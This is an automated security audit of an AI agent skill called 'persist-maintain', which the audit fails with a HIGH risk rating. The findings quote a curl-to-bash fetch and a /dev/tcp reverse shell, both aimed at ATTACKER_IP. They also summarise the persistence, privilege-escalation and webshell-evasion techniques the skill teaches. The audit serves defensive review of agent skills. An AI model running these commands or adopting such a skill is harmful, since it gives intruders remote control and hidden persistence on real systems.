Skills
skills/wgpsec/aboutsecurity/persist-maintain/Gen Agent Trust Hub

persist-maintain

Fail

Audited by Gen Agent Trust Hub on Apr 22, 2026

Risk Level: HIGHREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONCREDENTIALS_UNSAFE
Full Analysis
  • [REMOTE_CODE_EXECUTION]: The skill instructs the agent to execute remote scripts by piping curl output directly into bash (e.g., curl http://ATTACKER_IP/payload.sh | bash) and using PowerShell's IEX to download and execute code from arbitrary remote servers.
  • [COMMAND_EXECUTION]: Provides multiple reverse shell commands designed to establish unauthorized outgoing connections to attacker-controlled infrastructure (e.g., bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1).
  • [COMMAND_EXECUTION]: Documents extensive persistence mechanisms including modifying crontabs, creating malicious systemd services, adding Windows Registry Run keys, and configuring WMI event subscriptions for hidden execution.
  • [COMMAND_EXECUTION]: Includes privilege escalation techniques such as creating SUID shells (chmod u+s) and replacing the Windows Sticky Keys binary (sethc.exe) with cmd.exe to gain SYSTEM-level access.
  • [COMMAND_EXECUTION]: Provides PHP webshell snippets and obfuscation strategies (e.g., array_map('assert', ...) and string concatenation) specifically designed to evade file integrity and malware scanners.
  • [CREDENTIALS_UNSAFE]: Instructs on the unauthorized modification of sensitive system files like /root/.ssh/authorized_keys to maintain persistent SSH access.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Apr 22, 2026, 10:08 AM